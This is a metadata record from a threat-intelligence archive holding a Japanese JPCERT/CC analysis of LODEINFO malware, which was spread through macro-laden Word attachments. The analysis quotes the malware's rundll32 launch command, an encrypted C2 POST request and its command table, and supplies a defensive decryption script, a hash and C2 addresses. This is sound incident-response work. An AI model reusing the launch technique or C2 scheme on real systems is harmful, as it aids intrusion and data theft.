{
	"id": "9a857d0d-dff3-4c01-8bea-85e5b6a2946d",
	"created_at": "2026-04-06T00:18:06.130093Z",
	"updated_at": "2026-04-10T13:12:53.923353Z",
	"deleted_at": null,
	"sha1_hash": "b7722a6a23b41b2a2f1c58a97ad2f23449d71766",
	"title": "日本国内の組織を狙ったマルウエアLODEINFO - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 998726,
	"plain_text": "日本国内の組織を狙ったマルウエアLODEINFO - JPCERT/CC\r\nEyes\r\nBy 喜野 孝太(Kota Kino)\r\nPublished: 2020-02-19 · Archived: 2026-04-05 18:48:33 UTC\r\nLODEINFO\r\nJPCERT/CCでは、2019年12月頃に日本国内の組織を狙った標的型攻撃メールを確認しています。\r\n標的型攻撃メールには、これまでJPCERT/CCでは確認していなかった、「LODEINFO」と呼ばれる新\r\nたなマルウエアに感染させようとする不正なWord文書が添付されていました。 今回は、新たなマルウ\r\nエアLODEINFOの詳細について紹介します。\r\nLODEINFOが動作するまでの流れ\r\n図1は、LODEINFOが動作するまでの流れを示しています。\r\n図 1：LODEINFOが動作するまでの流れ\r\nJPCERT/CCが確認した検体では、Word文書のマクロを有効化することでLODEINFOがホスト上に作成\r\nされ、以下のコマンドでrundll32.exeから実行されます。\r\nwmic process call create \"cmd /c cd %ProgramData%\u0026start rundll32.exe [LODEINFOのファイルパス] main\"\r\nその後、LODEINFOはsvchost.exeのプロセスを起動し、ペイロードをインジェクションして動作しま\r\nす。\r\nhttps://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html\r\nPage 1 of 7\n\n以降では、インジェクションされた後のLODEINFOの詳細な挙動について解説します。\r\nLODEINFOの挙動の詳細\r\nLODEINFOは、特定のサイトとHTTPで通信を行い、受信した命令を実行します。\r\n以下は、LODEINFOが送信するHTTP POSTリクエストの例です。\r\nPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7\r\nHost: [ホスト名]\r\nContent-Length: 193\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\ndata=DIajqcc5lVuJpjwvr36msbQAAADitmc5LmhLlVituiM4OtDohYHRxBJ2R5yWjTYNyBTkUMGD2CPFpZw02cwPvl3Yb0SmUAAA\r\nデータはAESで暗号化した後に、BASE64エンコードされています。データには、LODEINFOが動作し\r\nているホストのホスト名や言語環境、MACアドレスなどの情報が含まれています。図2は、送信データ\r\nをデコードした例です。（送信するデータのフォーマットについては、Appendix Aをご覧ください）\r\n図2：デコードした送信データの一部\r\n以下は、HTTP POSTリクエストのデータを復号するコードの一部です。\r\nfrom Crypto.Cipher import AES\r\nfrom base64 import urlsafe_b64decode\r\nfrom binascii import a2b_hex\r\ndef decypt_lodeinfo_data(enc_data: str, key: bytes, iv: bytes) -\u003e bytes:\r\n header_b64 = enc_data[:0x1C]\r\n header = urlsafe_b64decode(header_b64.replace(\".\", \"=\"))\r\n ## decode with base64\r\n postdata_size = int.from_bytes(header[0x10:0x14], byteorder=\"little\")\r\n postdata_b64 = enc_data[0x1C:0x1C+postdata_size]\r\n postdata = urlsafe_b64decode(postdata_b64.replace(\".\", \"=\"))\r\n ## decrypt with AES\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\nhttps://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html\r\nPage 2 of 7\n\ndecrypt_size = int.from_bytes(postdata[0x30:0x34],byteorder=\"little\")\r\n dec_data = cipher.decrypt(postdata[0x34:0x34+decrypt_size])\r\n ## remove junk bytes\r\n junk_size = dec_data[-1]\r\n dec_data = dec_data[:decrypt_size-junk_size]\r\n return dec_data\r\nencrypted_data = \"DIajqcc5lVuJpjwvr36msbQAAADitmc5LmhLlVituiM4OtDohYHRxBJ2R5yWjTYNyBTkUMGD2CPFpZw02cw\r\nKEY = a2b_hex(\"E20EF6C66A838DA222821DB1C5777251F1A9D5D14D2344CED68A353BFCAC4C5A\")\r\nIV = a2b_hex(\"CC45ABAD58152C6150F157367ECC53F3\")\r\ndecrypted_data = decypt_lodeinfo_data(encrypted_data, KEY ,IV)\r\nprint(\"Decrypted Data: \", bytes.hex(decrypted_data))\r\n次に、LODEINFOはコマンドを受信します。C\u0026Cサーバからのレスポンスは、HTTP POSTリクエスト\r\nと同様に、AESとBASE64を組み合わせて暗号化が行われています。LODEINFOは受信したコマンドに\r\n応じて、以下の機能などを実行します。（コマンドの詳細についてはAppendix Bをご覧ください）\r\nPEファイルの実行\r\nシェルコードの実行\r\nファイルのアップロード・ダウンロード\r\nプロセスの停止\r\nファイル一覧の送信\r\nマルウエアバージョン情報の送信\r\nLODEINFOで利用されているコード\r\nLODEINFOを分析した結果、GitHub上で公開されているLodePNG[1]と呼ばれるPNGファイルのエンコ\r\nーダー/デコーダーのソースコードと類似する部分が多数あることを確認しました。ただし、LodePNG\r\nの機能を悪用している箇所は確認できていないため、攻撃者が当該コードを利用している理由につい\r\nては不明です。\r\nおわりに\r\nLODEINFOには、複数の箇所でデバッグ用と思われる文字列が記載されている他、バージョン情報と\r\nしてv0.1.2といった文字列が確認でき、現在も開発途中の可能性があります。今後もLODEINFOを利用\r\nした攻撃が続く可能性もあるため、注意が必要です。\r\nなお、今回解説したLODEINFOと類似する検体のハッシュ値をAppendix C、確認した通信先をAppendix\r\nDに記載しています。 Appendix Dの通信先に対して通信が発生していないかをご確認ください。\r\nインシデントレスポンスグループ 喜野 孝太\r\nhttps://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html\r\nPage 3 of 7\n\n参考情報\r\n[1] GitHub: LodePNG - PNG encoder and decoder in C and C++\r\nhttps://github.com/lvandeve/lodepng\r\nAppendix A 送受信データの内容\r\n表 A-1:データフォーマット（BASE64デコード後）\r\nオフセット 長さ 内容\r\n0x00 16 AESキーのSHA512値（先頭16byte）\r\n0x10 4 0x15以降のデータをBASE64エンコードしたサイズ\r\n0x14 1 不明\r\n0x15 48 AESで暗号化される前のデータのSHA512値（先頭48byte）\r\n0x45 4 AESで暗号化されたデータのサイズ\r\n0x49 可変 AESで暗号化されたデータ\r\n表 A-2:BASE64デコードした送信データの例\r\nAppendix B コマンド一覧\r\n表 B: コマンド一覧\r\n値 内容\r\nMZ PEファイルの実行\r\n0xE9 シェルコードの実行\r\ncd カレントディレクトリの変更\r\nhttps://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html\r\nPage 4 of 7\n\n値 内容\r\nls ファイル一覧の送信\r\nsend ファイルダウンロード\r\nrecv ファイルアップロード\r\ncat ファイルアップロード\r\nmemory シェルコードの実行（svchost.exeにインジェクション）\r\nkill 任意プロセスの停止\r\nver マルウエアバージョン情報の送信\r\nAppendix C 検体のハッシュ値\r\nb50d83820a5704522fee59164d7bc69bea5c834ebd9be7fd8ad35b040910807f\r\nAppendix D 通信先\r\n45.67.231.169\r\n162.244.32.148\r\n193.228.52.57\r\n喜野 孝太(Kota Kino)\r\n2019年8月から現職。主に、マルウェア分析・フォレンジック調査に従事。\r\n関連記事\r\nhttps://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html\r\nPage 5 of 7\n\nJSAC2026 開催レポート～DAY 2～\r\n攻撃グループAPT-C-60による攻撃のアップデート\r\nCobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツール「CrossC2」を使った攻\r\n撃\r\nhttps://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html\r\nPage 6 of 7\n\nIvanti Connect Secureの脆弱性を起点とした侵害で確認されたマルウェア\r\nIvanti Connect Secureに設置されたマルウェアDslogdRAT\r\nSource: https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html\r\nhttps://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "JA",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html"
	],
	"report_names": [
		"LODEINFO.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434686,
	"ts_updated_at": 1775826773,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b7722a6a23b41b2a2f1c58a97ad2f23449d71766.pdf",
		"text": "https://archive.orkl.eu/b7722a6a23b41b2a2f1c58a97ad2f23449d71766.txt",
		"img": "https://archive.orkl.eu/b7722a6a23b41b2a2f1c58a97ad2f23449d71766.jpg"
	}
}